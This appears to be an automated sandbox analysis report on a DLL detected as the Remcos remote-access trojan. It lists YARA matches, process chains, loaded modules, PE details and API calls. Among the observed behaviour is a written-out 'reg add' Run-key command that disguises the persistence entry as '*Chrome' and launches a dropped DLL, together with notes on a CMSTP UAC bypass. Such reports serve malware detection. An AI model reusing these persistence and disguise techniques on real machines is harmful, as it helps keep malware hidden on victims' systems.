              Source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 3.2.regsvr32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 24.2.rundll32.exe.2a40000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 4.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 18.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
               Rules matched in the rows below, with their metadata as reported by the sandbox (listed once here instead of on every row):
               Windows_Trojan_Remcos_b296e965: reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
               REMCOS_RAT_variants: Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
               INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM: author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
               Source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965
               Source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965
               Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965
               Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965
               Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965
               Source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965
               Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965
               Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 00000014.00000002.2517552201.0000000003850000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 00000014.00000002.2521295751.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965
               Source: 00000018.00000002.2511207483.0000000002A40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
               Source: Process Memory Space: loaddll32.exe PID: 7496, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965
               Source: Process Memory Space: regsvr32.exe PID: 7556, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965
               Source: Process Memory Space: rundll32.exe PID: 7572, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965
               Source: Process Memory Space: rundll32.exe PID: 7580, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965
               Source: Process Memory Space: rundll32.exe PID: 7644, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965
               Source: Process Memory Space: rundll32.exe PID: 7668, type: MEMORYSTR, Matched rule: Windows_Trojan_Remcos_b296e965
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winDLL@40/1@2/1
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B17952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_02B17952
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A17952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,15_2_02A17952
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B0F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_02B0F474
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B1B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,12_2_02B1B4A8
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B1AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_02B1AA4A
              Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Roaming\VIVA_01.dll
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8024:120:WilError_03
              Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\bghtyi-ILS8CA
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
              Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: 7P7cuKWTfN.dll | ReversingLabs: Detection: 47%
              Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll"
              Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1
              Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\7P7cuKWTfN.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1
              Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllCanUnloadNow
              Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllGetClassObject
              Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\7P7cuKWTfN.dll,DllRegisterServer
              Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f & exit
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f
              Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" (no command-line parameters; six instances)
              Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\SysWOW64\regsvr32.exe" (no command-line parameters)
              Source: unknown | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint (two instances)
              Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint (two instances)
              Source: C:\Windows\System32\loaddll32.exe | Sections loaded (in order): apphelp.dll, netapi32.dll, version.dll, msacm32.dll, powrprof.dll, wininet.dll, secur32.dll, wtsapi32.dll, userenv.dll, winmm.dll, avifil32.dll, msvfw32.dll, winmmbase.dll, avicap32.dll, d3d9.dll, wsock32.dll, kernel.appcore.dll, dwmapi.dll, windows.storage.dll, wldp.dll, sspicli.dll, umpdc.dll, k7rn7l32.dll, ntd3ll.dll, d3d10warp.dll (k7rn7l32.dll and ntd3ll.dll are look-alike names for kernel32.dll and ntdll.dll, reproduced here as reported)
              Source: C:\Windows\SysWOW64\cmd.exe | Sections loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\regsvr32.exe | Sections loaded (in order): apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, kernel.appcore.dll, uxtheme.dll, netapi32.dll, version.dll, msacm32.dll, powrprof.dll, wininet.dll, secur32.dll, wtsapi32.dll, userenv.dll, winmm.dll, avifil32.dll, msvfw32.dll, avicap32.dll, d3d9.dll, wsock32.dll, winmmbase.dll, sspicli.dll, dwmapi.dll, windows.storage.dll, wldp.dll, umpdc.dll, k7rn7l32.dll, ntd3ll.dll, d3d10warp.dll
              Source: C:\Windows\SysWOW64\regsvr32.exe (second instance) | Sections loaded (in order): apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, winmm.dll, urlmon.dll, wininet.dll, iertutil.dll, srvcli.dll, netutils.dll, iphlpapi.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, kernel.appcore.dll
              Source: 7P7cuKWTfN.dll | Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: 7P7cuKWTfN.dll | Static file information: File size 15798272 > 1048576
              Source: 7P7cuKWTfN.dll | Static PE information: Raw size of .text is bigger than: 0x100000 < 0xbe1e00
              Source: 7P7cuKWTfN.dll | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x237e00
              Source: 7P7cuKWTfN.dll | Static PE information: More than 200 imports for KERNEL32.dll
              Source: 7P7cuKWTfN.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
              Source: 7P7cuKWTfN.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.1_builds\output\G2M.pdb | source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2208689162.0000000005130000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2183888042.0000000005970000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2230140553.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.2229687119.00000000059C0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.2242606195.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000006.00000002.2210956145.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2230531046.0000000010DA4000.00000002.00000001.01000000.00000003.sdmp
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B1CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_02B1CB50
              Source: 7P7cuKWTfN.dll | Static PE information: section name: .orpc
              Source: VIVA_01.dll.4.dr | Static PE information: section name: .orpc
              Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\7P7cuKWTfN.dll
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B57106 push ecx; ret 12_2_02B57119
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B57A28 push eax; ret 12_2_02B57A46
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B5C9A6 pushfd ; retf 12_2_02B5C9A9
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B5C986 pushad ; retf 12_2_02B5C989
